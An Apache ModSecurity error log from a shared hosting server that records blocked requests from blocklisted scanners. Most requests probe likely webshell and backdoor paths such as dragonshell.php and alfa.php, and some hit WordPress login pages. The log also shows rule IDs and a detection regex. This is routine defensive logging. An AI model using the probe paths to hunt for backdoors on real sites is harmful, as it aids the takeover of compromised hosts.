[Tue May 26 16:35:18.635603 2026] [security2:error] [pid 808625:tid 808866] [client 130.131.224.225:62700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/lib.php"] [unique_id "ahV-bjEl_SBaWibfDmpiGAAAAG8"]
[Tue May 26 16:35:18.635735 2026] [security2:error] [pid 808625:tid 808866] [client 130.131.224.225:62700] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/lib.php"] [unique_id "ahV-bjEl_SBaWibfDmpiGAAAAG8"]
[Tue May 26 16:35:18.676435 2026] [security2:error] [pid 808625:tid 808758] [client 20.151.117.104:25825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws81.php"] [unique_id "ahV-bjEl_SBaWibfDmpiGwAAAAM"]
[Tue May 26 16:35:18.676549 2026] [security2:error] [pid 808625:tid 808758] [client 20.151.117.104:25825] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ws81.php"] [unique_id "ahV-bjEl_SBaWibfDmpiGwAAAAM"]
[Tue May 26 16:35:18.820101 2026] [security2:error] [pid 808625:tid 808776] [client 20.151.117.104:9789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahV-bjEl_SBaWibfDmpiHgAAABU"]
[Tue May 26 16:35:18.820211 2026] [security2:error] [pid 808625:tid 808776] [client 20.151.117.104:9789] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahV-bjEl_SBaWibfDmpiHgAAABU"]
[Tue May 26 16:35:18.838111 2026] [security2:error] [pid 808625:tid 808799] [client 130.131.224.225:65133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sys.php"] [unique_id "ahV-bjEl_SBaWibfDmpiIAAAACw"]
[Tue May 26 16:35:18.838214 2026] [security2:error] [pid 808625:tid 808799] [client 130.131.224.225:65133] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sys.php"] [unique_id "ahV-bjEl_SBaWibfDmpiIAAAACw"]
[Tue May 26 16:35:18.964061 2026] [security2:error] [pid 808625:tid 808785] [client 20.151.117.104:9738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV-bjEl_SBaWibfDmpiJgAAAB4"]
[Tue May 26 16:35:18.964167 2026] [security2:error] [pid 808625:tid 808785] [client 20.151.117.104:9738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV-bjEl_SBaWibfDmpiJgAAAB4"]
[Tue May 26 16:35:19.112613 2026] [security2:error] [pid 808625:tid 808779] [client 20.151.117.104:27060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/maint/index.php"] [unique_id "ahV-bzEl_SBaWibfDmpiKgAAABg"]
[Tue May 26 16:35:19.112721 2026] [security2:error] [pid 808625:tid 808779] [client 20.151.117.104:27060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/maint/index.php"] [unique_id "ahV-bzEl_SBaWibfDmpiKgAAABg"]
[Tue May 26 16:35:19.155013 2026] [security2:error] [pid 808625:tid 808860] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-bjEl_SBaWibfDmpiGQAAAGk"]
[Tue May 26 16:35:19.257107 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:22335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahV-bzEl_SBaWibfDmpiKwAAAAY"]
[Tue May 26 16:35:19.257256 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:22335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/6xBAm3vODE05BSzkJZRAws.php"] [unique_id "ahV-bzEl_SBaWibfDmpiKwAAAAY"]
[Tue May 26 16:35:19.401992 2026] [security2:error] [pid 808625:tid 808803] [client 20.151.117.104:34875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a.php"] [unique_id "ahV-bzEl_SBaWibfDmpiLQAAADA"]
[Tue May 26 16:35:19.402134 2026] [security2:error] [pid 808625:tid 808803] [client 20.151.117.104:34875] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a.php"] [unique_id "ahV-bzEl_SBaWibfDmpiLQAAADA"]
[Tue May 26 16:35:19.545723 2026] [security2:error] [pid 808625:tid 808762] [client 20.151.117.104:27069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahV-bzEl_SBaWibfDmpiLgAAAAc"]
[Tue May 26 16:35:19.545828 2026] [security2:error] [pid 808625:tid 808762] [client 20.151.117.104:27069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahV-bzEl_SBaWibfDmpiLgAAAAc"]
[Tue May 26 16:35:19.616305 2026] [security2:error] [pid 808625:tid 808791] [client 130.131.224.225:65143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/lala.php"] [unique_id "ahV-bzEl_SBaWibfDmpiLwAAACQ"]
[Tue May 26 16:35:19.616426 2026] [security2:error] [pid 808625:tid 808791] [client 130.131.224.225:65143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/lala.php"] [unique_id "ahV-bzEl_SBaWibfDmpiLwAAACQ"]
[Tue May 26 16:35:19.688723 2026] [security2:error] [pid 808625:tid 808769] [client 20.151.117.104:35817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/onclickfuns.php"] [unique_id "ahV-bzEl_SBaWibfDmpiOQAAAA4"]
[Tue May 26 16:35:19.688836 2026] [security2:error] [pid 808625:tid 808769] [client 20.151.117.104:35817] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/onclickfuns.php"] [unique_id "ahV-bzEl_SBaWibfDmpiOQAAAA4"]
[Tue May 26 16:35:19.832541 2026] [security2:error] [pid 808625:tid 808834] [client 20.151.117.104:31281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahV-bzEl_SBaWibfDmpiPQAAAE8"]
[Tue May 26 16:35:19.832674 2026] [security2:error] [pid 808625:tid 808834] [client 20.151.117.104:31281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahV-bzEl_SBaWibfDmpiPQAAAE8"]
[Tue May 26 16:35:19.976530 2026] [security2:error] [pid 808625:tid 808766] [client 20.151.117.104:21030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/maint/about.php"] [unique_id "ahV-bzEl_SBaWibfDmpiQQAAAAs"]
[Tue May 26 16:35:19.976656 2026] [security2:error] [pid 808625:tid 808766] [client 20.151.117.104:21030] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-admin/maint/about.php"] [unique_id "ahV-bzEl_SBaWibfDmpiQQAAAAs"]
[Tue May 26 16:35:20.120584 2026] [security2:error] [pid 808625:tid 808841] [client 20.151.117.104:21031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/index.php"] [unique_id "ahV-cDEl_SBaWibfDmpiQgAAAFY"]
[Tue May 26 16:35:20.120726 2026] [security2:error] [pid 808625:tid 808841] [client 20.151.117.104:21031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/index.php"] [unique_id "ahV-cDEl_SBaWibfDmpiQgAAAFY"]
[Tue May 26 16:35:20.264561 2026] [security2:error] [pid 808625:tid 808828] [client 20.151.117.104:22311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahV-cDEl_SBaWibfDmpiSQAAAEk"]
[Tue May 26 16:35:20.264713 2026] [security2:error] [pid 808625:tid 808828] [client 20.151.117.104:22311] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahV-cDEl_SBaWibfDmpiSQAAAEk"]
[Tue May 26 16:35:20.370600 2026] [security2:error] [pid 808625:tid 808866] [client 130.131.224.225:64590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahV-cDEl_SBaWibfDmpiSwAAAG8"]
[Tue May 26 16:35:20.370757 2026] [security2:error] [pid 808625:tid 808866] [client 130.131.224.225:64590] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahV-cDEl_SBaWibfDmpiSwAAAG8"]
[Tue May 26 16:35:20.407649 2026] [security2:error] [pid 808625:tid 808858] [client 20.151.117.104:35778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/.info.php"] [unique_id "ahV-cDEl_SBaWibfDmpiTAAAAGc"]
[Tue May 26 16:35:20.407752 2026] [security2:error] [pid 808625:tid 808858] [client 20.151.117.104:35778] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/.info.php"] [unique_id "ahV-cDEl_SBaWibfDmpiTAAAAGc"]
[Tue May 26 16:35:20.552948 2026] [security2:error] [pid 808625:tid 808849] [client 20.151.117.104:34877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/config.php"] [unique_id "ahV-cDEl_SBaWibfDmpiTgAAAF4"]
[Tue May 26 16:35:20.553068 2026] [security2:error] [pid 808625:tid 808849] [client 20.151.117.104:34877] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/config.php"] [unique_id "ahV-cDEl_SBaWibfDmpiTgAAAF4"]
[Tue May 26 16:35:20.632395 2026] [security2:error] [pid 808625:tid 808797] [client 74.7.241.144:35244] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.nachiresidency.in.svijaykumar.in"] [uri "/robots.txt"] [unique_id "ahV-cDEl_SBaWibfDmpiUAAAKlY"]
[Tue May 26 16:35:20.676038 2026] [security2:error] [pid 808625:tid 808709] [remote 94.76.235.103:47956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV-cDEl_SBaWibfDmpiTQAAX1M"]
[Tue May 26 16:35:20.696594 2026] [security2:error] [pid 808625:tid 808853] [client 20.151.117.104:21017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahV-cDEl_SBaWibfDmpiVQAAAGI"]
[Tue May 26 16:35:20.696707 2026] [security2:error] [pid 808625:tid 808853] [client 20.151.117.104:21017] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahV-cDEl_SBaWibfDmpiVQAAAGI"]
[Tue May 26 16:35:20.845048 2026] [security2:error] [pid 808625:tid 808867] [client 20.151.117.104:52835] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/albin.php"] [unique_id "ahV-cDEl_SBaWibfDmpiXAAAAHA"]
[Tue May 26 16:35:20.845140 2026] [security2:error] [pid 808625:tid 808867] [client 20.151.117.104:52835] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/albin.php"] [unique_id "ahV-cDEl_SBaWibfDmpiXAAAAHA"]
[Tue May 26 16:35:20.909333 2026] [security2:error] [pid 808625:tid 808775] [client 130.131.224.225:63920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fun.php"] [unique_id "ahV-cDEl_SBaWibfDmpiXwAAABQ"]
[Tue May 26 16:35:20.909437 2026] [security2:error] [pid 808625:tid 808775] [client 130.131.224.225:63920] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fun.php"] [unique_id "ahV-cDEl_SBaWibfDmpiXwAAABQ"]
[Tue May 26 16:35:20.988854 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:54364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV-cDEl_SBaWibfDmpiYAAAAAY"]
[Tue May 26 16:35:20.988965 2026] [security2:error] [pid 808625:tid 808761] [client 20.151.117.104:54364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahV-cDEl_SBaWibfDmpiYAAAAAY"]
[Tue May 26 16:35:21.138105 2026] [security2:error] [pid 808625:tid 808808] [client 20.151.117.104:2136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahV-cTEl_SBaWibfDmpiZAAAADU"]
[Tue May 26 16:35:21.138247 2026] [security2:error] [pid 808625:tid 808808] [client 20.151.117.104:2136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/autoload_classmap.php"] [unique_id "ahV-cTEl_SBaWibfDmpiZAAAADU"]
[Tue May 26 16:35:21.167894 2026] [security2:error] [pid 808625:tid 808846] [client 130.131.224.225:65046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-the.php"] [unique_id "ahV-cTEl_SBaWibfDmpiZgAAAFs"]
[Tue May 26 16:35:21.168013 2026] [security2:error] [pid 808625:tid 808846] [client 130.131.224.225:65046] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-the.php"] [unique_id "ahV-cTEl_SBaWibfDmpiZgAAAFs"]
[Tue May 26 16:35:21.281707 2026] [security2:error] [pid 808625:tid 808865] [client 20.151.117.104:21054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahV-cTEl_SBaWibfDmpiagAAAG4"]
[Tue May 26 16:35:21.281817 2026] [security2:error] [pid 808625:tid 808865] [client 20.151.117.104:21054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahV-cTEl_SBaWibfDmpiagAAAG4"]
[Tue May 26 16:35:21.304121 2026] [security2:error] [pid 808625:tid 808762] [client 130.131.224.225:63931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahV-cTEl_SBaWibfDmpiawAAAAc"]
[Tue May 26 16:35:21.304234 2026] [security2:error] [pid 808625:tid 808762] [client 130.131.224.225:63931] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahV-cTEl_SBaWibfDmpiawAAAAc"]
[Tue May 26 16:35:21.342039 2026] [security2:error] [pid 808625:tid 808856] [client 62.60.130.233:64519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-login.php"] [unique_id "ahV-cTEl_SBaWibfDmpiZQAAAGU"], referer: https://www.linkedin.com/
[Tue May 26 16:35:21.425525 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:25852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/dragonshell.php"] [unique_id "ahV-cTEl_SBaWibfDmpibQAAAFw"]
[Tue May 26 16:35:21.425696 2026] [security2:error] [pid 808625:tid 808847] [client 20.151.117.104:25852] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/dragonshell.php"] [unique_id "ahV-cTEl_SBaWibfDmpibQAAAFw"]
[Tue May 26 16:35:21.485597 2026] [security2:error] [pid 808625:tid 808784] [client 130.131.224.225:64636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahV-cTEl_SBaWibfDmpibgAAAB0"]
[Tue May 26 16:35:21.485718 2026] [security2:error] [pid 808625:tid 808784] [client 130.131.224.225:64636] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahV-cTEl_SBaWibfDmpibgAAAB0"]
[Tue May 26 16:35:21.521990 2026] [security2:error] [pid 808625:tid 808792] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-cDEl_SBaWibfDmpiWAAAACU"]
